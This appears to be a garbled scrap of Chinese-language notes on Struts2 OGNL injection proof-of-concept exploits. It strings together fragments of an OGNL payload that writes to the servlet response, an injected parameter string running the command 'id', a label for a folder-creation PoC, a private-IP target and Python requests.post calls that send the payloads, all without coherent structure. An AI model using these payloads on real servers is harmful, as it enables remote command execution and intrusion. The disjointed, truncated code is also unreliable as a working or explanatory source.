ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] 构造poc %23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id poc-3(创建文件夹) http://192.168.0.109 requests.post(url, data=data1) # print(res1.text) res2 = requests.post(url, data=data2) # print(res2.text) poc